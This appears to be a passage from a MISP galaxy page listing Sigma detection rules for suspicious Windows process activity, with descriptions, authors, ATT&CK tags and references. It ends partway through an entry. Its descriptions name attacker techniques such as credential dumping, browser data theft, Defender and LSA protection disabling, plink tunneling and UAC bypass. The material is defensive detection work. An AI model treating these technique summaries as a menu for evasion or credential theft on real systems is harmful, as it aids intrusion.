Related clusters
To see the related clusters, click here.
File Download From Browser Process Via Inline URL
Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.
Internal MISP references
UUID 94771a71-ba41-4b6e-a757-b531372eaab6 which can be used as unique global reference for File Download From Browser Process Via Inline URL in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-01-11 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_browsers_inline_file_download.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1105'] |
Related clusters
To see the related clusters, click here.
Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution
Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
Internal MISP references
UUID a20391f8-76fb-437b-abc0-dba2df1952c6 which can be used as unique global reference for Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-01-11 |
| falsepositive | ['Legitimate use by developers as part of NodeJS development with Visual Studio Tools'] |
| filename | proc_creation_win_pressanykey_lolbin_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.defense-evasion', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
Winrs Local Command Execution
Detects the execution of Winrs.exe where it is used to execute commands locally. Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement.
Internal MISP references
UUID bcfece3d-56fe-4545-9931-3b8e92927db1 which can be used as unique global reference for Winrs Local Command Execution in MISP communities and other software using the MISP galaxy
External references
- https://cardinalops.com/blog/living-off-winrm-abusing-complexity-in-remote-management/ - webarchive
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winrs - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrs_local_command_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Liran Ravich, Nasreddine Bencherchali |
| creation_date | 2025-10-22 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_winrs_local_command_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.defense-evasion', 'attack.t1021.006', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
Potentially Suspicious Ping/Copy Command Combination
Detects uncommon and potentially suspicious one-liner commands containing both "ping" and "copy" at the same time, a combination commonly used by malware.
Internal MISP references
UUID ded2b07a-d12f-4284-9b76-653e37b6c8b0 which can be used as unique global reference for Potentially Suspicious Ping/Copy Command Combination in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | X__Junior (Nextron Systems) |
| creation_date | 2023-07-18 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_cmd_ping_copy_combined_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1070.004'] |
Related clusters
To see the related clusters, click here.
Potential Configuration And Service Reconnaissance Via Reg.EXE
Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.
Internal MISP references
UUID 970007b7-ce32-49d0-a4a4-fbef016950bd which can be used as unique global reference for Potential Configuration And Service Reconnaissance Via Reg.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Timur Zinniatullin, oscd.community |
| creation_date | 2019-10-21 |
| falsepositive | ['Discord'] |
| filename | proc_creation_win_reg_query_registry.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1012', 'attack.t1007'] |
Related clusters
To see the related clusters, click here.
Renamed AdFind Execution
Detects the use of a renamed Adfind.exe. AdFind continues to be seen across the majority of breaches. It is used for domain trust discovery to plan out subsequent steps in the attack chain.
Internal MISP references
UUID df55196f-f105-44d3-a675-e9dfb6cc2f2b which can be used as unique global reference for Renamed AdFind Execution in MISP communities and other software using the MISP galaxy
External references
- https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx - webarchive
- https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ - webarchive
- https://thedfirreport.com/2020/05/08/adfind-recon/ - webarchive
- https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/ - webarchive
- https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md - webarchive
- https://www.joeware.net/freetools/tools/adfind/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-08-21 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_renamed_adfind.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1018', 'attack.t1087.002', 'attack.t1482', 'attack.t1069.002'] |
Related clusters
To see the related clusters, click here.
Procdump Execution
Detects usage of the SysInternals Procdump utility
Internal MISP references
UUID 2e65275c-8288-4ab4-aeb7-6274f58b6b20 which can be used as unique global reference for Procdump Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-08-16 |
| falsepositive | ['Legitimate use of procdump by a developer or administrator'] |
| filename | proc_creation_win_sysinternals_procdump.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036', 'attack.t1003.001', 'attack.credential-access'] |
Related clusters
To see the related clusters, click here.
Potential Suspicious Registry File Imported Via Reg.EXE
Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility
Internal MISP references
UUID 62e0298b-e994-4189-bc87-bc699aa62d97 which can be used as unique global reference for Potential Suspicious Registry File Imported Via Reg.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali |
| creation_date | 2022-08-01 |
| falsepositive | ['Legitimate import of keys'] |
| filename | proc_creation_win_reg_import_from_suspicious_paths.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1112', 'attack.defense-evasion'] |
Related clusters
To see the related clusters, click here.
Windows Hotfix Updates Reconnaissance Via Wmic.EXE
Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts.
Internal MISP references
UUID dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45 which can be used as unique global reference for Windows Hotfix Updates Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy
External references
- https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html - webarchive
- https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_hotfix.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-06-20 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wmic_recon_hotfix.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1047'] |
Related clusters
To see the related clusters, click here.
Potential RDP Tunneling Via Plink
Detects the execution of plink to perform data exfiltration and tunneling
Internal MISP references
UUID f38ce0b9-5e97-4b47-a211-7dc8d8b871da which can be used as unique global reference for Potential RDP Tunneling Via Plink in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-08-04 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_plink_susp_tunneling.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1572'] |
Related clusters
To see the related clusters, click here.
Renamed Cloudflared.EXE Execution
Detects the execution of a renamed "cloudflared" binary.
Internal MISP references
UUID e0c69ebd-b54f-4aed-8ae3-e3467843f3f0 which can be used as unique global reference for Renamed Cloudflared.EXE Execution in MISP communities and other software using the MISP galaxy
External references
- https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/ - webarchive
- https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/ - webarchive
- https://github.com/cloudflare/cloudflared - webarchive
- https://github.com/cloudflare/cloudflared/releases - webarchive
- https://www.intrinsec.com/akira_ransomware/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_cloudflared.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-12-20 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_renamed_cloudflared.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1090.001'] |
Related clusters
To see the related clusters, click here.
FileFix - Suspicious Child Process from Browser File Upload Abuse
Detects potentially suspicious subprocesses such as LOLBINs spawned by web browsers. This activity could be associated with the "FileFix" social engineering technique, where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar. The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities.
Internal MISP references
UUID 4be03877-d5b6-4520-85c9-a5911c0a656c which can be used as unique global reference for FileFix - Suspicious Child Process from Browser File Upload Abuse in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | 0xFustang |
| creation_date | 2025-06-26 |
| falsepositive | ['Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools'] |
| filename | proc_creation_win_filefix_browsers.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1204.004'] |
Related clusters
To see the related clusters, click here.
Potential Adplus.EXE Abuse
Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.
Internal MISP references
UUID 2f869d59-7f6a-4931-992c-cce556ff2d53 which can be used as unique global reference for Potential Adplus.EXE Abuse in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/nas_bench/status/1534915321856917506 - webarchive
- https://twitter.com/nas_bench/status/1534916659676422152 - webarchive
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_adplus_memory_dump.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-06-09 |
| falsepositive | ['Legitimate usage of Adplus for debugging purposes'] |
| filename | proc_creation_win_adplus_memory_dump.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.credential-access', 'attack.t1003.001'] |
Related clusters
To see the related clusters, click here.
PrintBrm ZIP Creation of Extraction
Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
Internal MISP references
UUID cafeeba3-01da-4ab4-b6c4-a31b1d9730c7 which can be used as unique global reference for PrintBrm ZIP Creation of Extraction in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-05-02 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_lolbin_printbrm.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1105', 'attack.defense-evasion', 'attack.t1564.004'] |
Related clusters
To see the related clusters, click here.
File Decryption Using Gpg4win
Detects usage of Gpg4win to decrypt files
Internal MISP references
UUID 037dcd71-33a8-4392-bb01-293c94663e5a which can be used as unique global reference for File Decryption Using Gpg4win in MISP communities and other software using the MISP galaxy
External references
- https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html - webarchive
- https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/ - webarchive
- https://www.gpg4win.de/documentation.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_decryption.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-09 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_gpg4win_decryption.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
Remote Access Tool - LogMeIn Execution
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMeIn, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and TeamViewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Internal MISP references
UUID d85873ef-a0f8-4c48-a53a-6b621f11729d which can be used as unique global reference for Remote Access Tool - LogMeIn Execution in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_logmein.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-02-11 |
| falsepositive | ['Legitimate use'] |
| filename | proc_creation_win_remote_access_tools_logmein.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
Related clusters
To see the related clusters, click here.
Potential Mftrace.EXE Abuse
Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe), which can be abused to execute arbitrary binaries.
Internal MISP references
UUID 3d48c9d3-1aa6-418d-98d3-8fd3c01a564e which can be used as unique global reference for Potential Mftrace.EXE Abuse in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-06-09 |
| falsepositive | ['Legitimate use for tracing purposes'] |
| filename | proc_creation_win_mftrace_child_process.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1127'] |
Related clusters
To see the related clusters, click here.
Sticky Key Like Backdoor Execution
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Internal MISP references
UUID 2fdefcb3-dbda-401e-ae23-f0db027628bc which can be used as unique global reference for Sticky Key Like Backdoor Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community |
| creation_date | 2018-03-15 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml |
| level | critical |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.008', 'car.2014-11-003', 'car.2014-11-008'] |
Related clusters
To see the related clusters, click here.
Potential Credential Dumping Attempt Using New NetworkProvider - CLI
Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
Internal MISP references
UUID baef1ec6-2ca9-47a3-97cc-4cf2bda10b77 which can be used as unique global reference for Potential Credential Dumping Attempt Using New NetworkProvider - CLI in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade - webarchive
- https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_new_network_provider.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-23 |
| falsepositive | ['Other legitimate network providers used and not filtred in this rule'] |
| filename | proc_creation_win_registry_new_network_provider.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003'] |
Password Set to Never Expire via WMI
Detects the use of wmic.exe to modify user account settings and explicitly disable password expiration.
Internal MISP references
UUID 7864a175-3654-4824-9f0d-f0da18ab27c0 which can be used as unique global reference for Password Set to Never Expire via WMI in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Daniel Koifman (KoifSec) |
| creation_date | 2025-07-30 |
| falsepositive | ['Legitimate administrative activity'] |
| filename | proc_creation_win_wmi_password_never_expire.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1047', 'attack.t1098'] |
Potential Discovery Activity Via Dnscmd.EXE
Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones are used to host the DNS records for a particular domain.
Internal MISP references
UUID b6457d63-d2a2-4e29-859d-4e7affc153d1 which can be used as unique global reference for Potential Discovery Activity Via Dnscmd.EXE in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/ - webarchive
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd - webarchive
- https://learn.microsoft.com/en-us/azure/dns/dns-zones-records - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | @gott_cyber |
| creation_date | 2022-07-31 |
| falsepositive | ['Legitimate administration use'] |
| filename | proc_creation_win_dnscmd_discovery.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.execution'] |
Potential Renamed Rundll32 Execution
Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection
Internal MISP references
UUID 2569ed8c-1147-498a-9b8c-2ad3656b10ed which can be used as unique global reference for Potential Renamed Rundll32 Execution in MISP communities and other software using the MISP galaxy
External references
- https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ - webarchive
- https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-22 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_renamed_rundll32_dllregisterserver.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
File Download Via InstallUtil.EXE
Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"
Internal MISP references
UUID 75edd216-1939-4c73-8d61-7f3a0d85b5cc which can be used as unique global reference for File Download Via InstallUtil.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-19 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_installutil_download.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
Logged-On User Password Change Via Ksetup.EXE
Detects a password change for the logged-on user via "ksetup.exe"
Internal MISP references
UUID c9783e20-4793-4164-ba96-d9ee483992c4 which can be used as unique global reference for Logged-On User Password Change Via Ksetup.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-04-06 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_ksetup_password_change_user.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
Potential Browser Data Stealing
Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.
Internal MISP references
UUID 47147b5b-9e17-4d76-b8d2-7bac24c5ce1b which can be used as unique global reference for Potential Browser Data Stealing in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md - webarchive
- https://www.cisa.gov/sites/default/files/2024-04/aa24-109a-stopransomware-akira-ransomware_2.pdf - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_browser_data.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-12-23 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_copy_browser_data.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1555.003'] |
RDP Port Forwarding Rule Added Via Netsh.EXE
Detects the execution of netsh to configure a port forwarding rule for port 3389 (RDP)
Internal MISP references
UUID 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63 which can be used as unique global reference for RDP Port Forwarding Rule Added Via Netsh.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), oscd.community |
| creation_date | 2019-01-29 |
| falsepositive | ['Legitimate administration activity'] |
| filename | proc_creation_win_netsh_port_forwarding_3389.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.defense-evasion', 'attack.command-and-control', 'attack.t1090'] |
Disable Windows Defender AV Security Monitoring
Detects attackers attempting to disable Windows Defender using PowerShell
Internal MISP references
UUID a7ee1722-c3c5-aeff-3212-c777e4733217 which can be used as unique global reference for Disable Windows Defender AV Security Monitoring in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - webarchive
- https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/ - webarchive
- https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | ok @securonix invrep-de, oscd.community, frack113 |
| creation_date | 2020-10-12 |
| falsepositive | ['Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice.'] |
| filename | proc_creation_win_powershell_disable_defender_av_security_monitoring.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
LSA PPL Protection Disabled Via Reg.EXE
Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process
Internal MISP references
UUID 8c0eca51-0f88-4db2-9183-fdfb10c703f9 which can be used as unique global reference for LSA PPL Protection Disabled Via Reg.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-03-22 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_reg_lsa_ppl_protection_disabled.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.010'] |
Sysinternals PsSuspend Suspicious Execution
Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses
Internal MISP references
UUID 4beb6ae0-f85b-41e2-8f18-8668abc8af78 which can be used as unique global reference for Sysinternals PsSuspend Suspicious Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-03-23 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_sysinternals_pssuspend_susp_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
AspNetCompiler Execution
Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.
Internal MISP references
UUID a01b8329-5953-4f73-ae2d-aa01e1f35f00 which can be used as unique global reference for AspNetCompiler Execution in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/ - webarchive
- https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-11-24 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_aspnet_compiler_exectuion.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1127'] |
Devtoolslauncher.exe Executes Specified Binary
Detects Devtoolslauncher.exe executing another binary.
Internal MISP references
UUID cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6 which can be used as unique global reference for Devtoolslauncher.exe Executes Specified Binary in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Beyu Denis, oscd.community (rule), @_felamos (idea) |
| creation_date | 2019-10-12 |
| falsepositive | ['Legitimate use of devtoolslauncher.exe by legitimate user'] |
| filename | proc_creation_win_lolbin_devtoolslauncher.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218'] |
UAC Bypass via Windows Firewall Snap-In Hijack
Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
Internal MISP references
UUID e52cb31c-10ed-4aea-bcb7-593c9f4a315b which can be used as unique global reference for UAC Bypass via Windows Firewall Snap-In Hijack in MISP communities and other software using the MISP galaxy
External references
- https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Tim Rauch, Elastic (idea) |
| creation_date | 2022-09-27 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548'] |
Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate
Detects the execution of an AnyDesk binary with a version prior to 8.0.8. Prior to version 8.0.8, the AnyDesk application used a signing certificate that got compromised by threat actors. Use this rule to detect instances of older versions of AnyDesk using the compromised certificate. This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.
Internal MISP references
UUID 41f407b5-3096-44ea-a74f-96d04fbc41be which can be used as unique global reference for Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate in MISP communities and other software using the MISP galaxy
External references
- https://anydesk.com/en/changelog/windows - webarchive
- https://www.bleepingcomputer.com/news/security/anydesk-says-hackers-breached-its-production-servers-reset-passwords/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_revoked_cert.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-02-08 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_remote_access_tools_anydesk_revoked_cert.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.initial-access'] |
Csc.EXE Execution Form Potentially Suspicious Parent
Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
Internal MISP references
UUID b730a276-6b63-41b8-bcf8-55930c8fc6ee which can be used as unique global reference for Csc.EXE Execution Form Potentially Suspicious Parent in MISP communities and other software using the MISP galaxy
External references
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html - webarchive
- https://reaqta.com/2017/11/short-journey-darkvnc/ - webarchive
- https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing - webarchive
